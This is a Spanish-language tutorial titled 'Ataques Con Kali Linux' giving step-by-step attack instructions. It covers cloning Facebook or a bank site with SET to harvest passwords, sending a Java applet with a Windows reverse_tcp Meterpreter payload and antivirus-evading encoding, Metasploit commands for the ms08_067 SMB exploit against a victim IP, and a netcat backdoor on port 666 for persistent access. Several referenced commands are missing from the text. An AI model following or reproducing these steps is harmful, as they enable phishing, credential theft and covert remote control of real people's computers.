Ataques Con Kali Linux
Ataques Con Kali Linux
Lo primero que practicaremos será la clonación de un sitio web para que el usuario
nos entregue su contraseña. Para ello:
1. Abrimos SET
2. Elegimos “1” y apretamos enter (Social-Engineering Attacks)
3. Ahora seleccionamos la “2” (Website Attack Vectors)
4. Cargamos la número “3” (Credential Harvester Attack Method)
5. Le sigue “2” (Site Cloner) y ponemos nuestra ip (Ej: 192.168.161.130)
6. Ingresamos la dirección a copiar (Ej: http://facebook.com o la de un banco)
7. Apretamos {return}
En este momento tendremos un página igual al de la página que elegimos si es que alguien
accede a nuestra ip desde un navegador web. La ingeniería social consiste en persuadir a la
persona de ingresar a la página para que, en esta, ingrese sus datos personales. Al momento
de ingresar sus datos será dirigido al sitio real y pensará que ingresó mal la contraseña
usualmente sin sospechar.
A nosotros, en pantalla nos aparecerán las siguientes cadenas de texto: “POSSIBLE
USERNAME FIELD FOUND: email=CUENTA” y “POSSIBLE PASSWORD FIELD
FOUND: pass=PASS” (donde CUENTA y PASS irán los datos ingresados por el usuario).
1. Abrimos SET
2. Seleccionamos el número 1, (Social Engineering Attacks)
3. A continuación, el “2” (Website Attack Vectors)
4. Luego “1” (Java Applet Attack Method). Esto creará una aplicación Java para
controlar la máquina.
5. Ahora elegimos “1” (Web Templates) para crear una página genérica, o la opción
“2” (Site Cloner) le permite a SET usar una web existente como plantilla.
6. Ahora habremos de elegir “1” (Java Required)
7. Elegimos un payload a enviar, usualmente se elite el “2” (Windows Reverse_TCP
Meterpreter), pero se puede elegir el que se desee (tienen diferente efectividad). Por
ejemplo, el número “13”, “ShellCodeExec Alphanum Shellcode” difiere de otros
porque corre desde la memoria, siendo efectivo contra la mayoría de los programas
antivirus.
8. Ahora debemos decidir un tipo de codificación para evitar programas antivirus.
“Shikata_ga_nai” es muy popular, “Multi-Encoder” usa múltiples codificadores, pero
el mejor es el “16” (Backdoored Executable). Éste último agrega el programa de
puerta trasera a un programa legítimo como Calc.exe.
9. Elige el puerto al cual escuchar (el predeterminado es suficiente). Ahora Kali Linux
lo configura todo. Crea el programa, lo codifica y lo empaqueta. Al terminar verás
una pantalla como esta:
10. Ya estamos listos. Ahora, si una víctima ingresa a la IP de nuestro computador, se le
solicitará correr una aplicación Java para ver el sitio correctamente. Si la corre,
tendremos una sesión remota a ese computador desde Backtrack:
11. Ahora que tenemos una puerta de acceso al PC, usemos “Sessions -i” y el número de
sesión para conectarnos. Una vez conectados podemos usar comandos de Linux para
navegar remotamente el PC, o correr “shell” para tener una línea de comandos de
Windows remota.
Eso es todo. El usuario puede cerrar el navegador y continuaremos conectados, porque una
vez que la shell se conecta, no se requiere más de la página web. La mayoría de los atacantes
solidificarán su conexión con el PC y unirán la sesión a otro proceso para hacer desaparecer
el shell.
• /etc/init.d/apache2 start
• /etc/init.d/ssh start
• sshd generate
Otra herramienta que puede sernos de utilidad es Lanmap, ya que nos genera una imagen de
como vendría a estar armada la red (Nos crea un mapa con los routers y computadores
existentes). Se utiliza mediante
Explotando vulnerabilidades:
Ahora, usando de base lo recolectado, podemos pasar a armar el ataque con metasploit. Esta
herramienta permite explotar una grandísima cantidad de fallos conocidos en los sistemas
para darnos acceso remoto a la máquina.
Como ejemplo, para explotar una vulnerabilidad en el puerto 445 debemos seleccionar lo
siguiente en metasplot (se debe cambiar IPVICTIMA e IPNUESTRA por los valores que
correspondan):
• use windows/smb/ms08_067_netapi
• set payload windows/meterpreter/reverse_tcp
• set RHOST IPVICTIMA
• set LHOST IPNUESTRA
• exploit (inicia el ataque y debiera darnos acceso a una línea de comandos de
Windows)
Afianzando la conexión
El ataque anterior dura hasta que la víctima o el atacante se desconecte. Para permitir acceso
futuros se han de habilitar “puertas traseras”. Para esto se usa la herramienta netcat.
Primero enviaremos netcat al computador víctima con:
Luego registraremos netcat para que inicie con Windows y nos habilite el puerto 666 para
permitirnos entrar cuando querramos:
Ahora podemos reiniciar con “reboot” y debiéramos podernos conectar mediante netcat o
metasploit directamente a la puerta trasera (puerto 666 en este caso).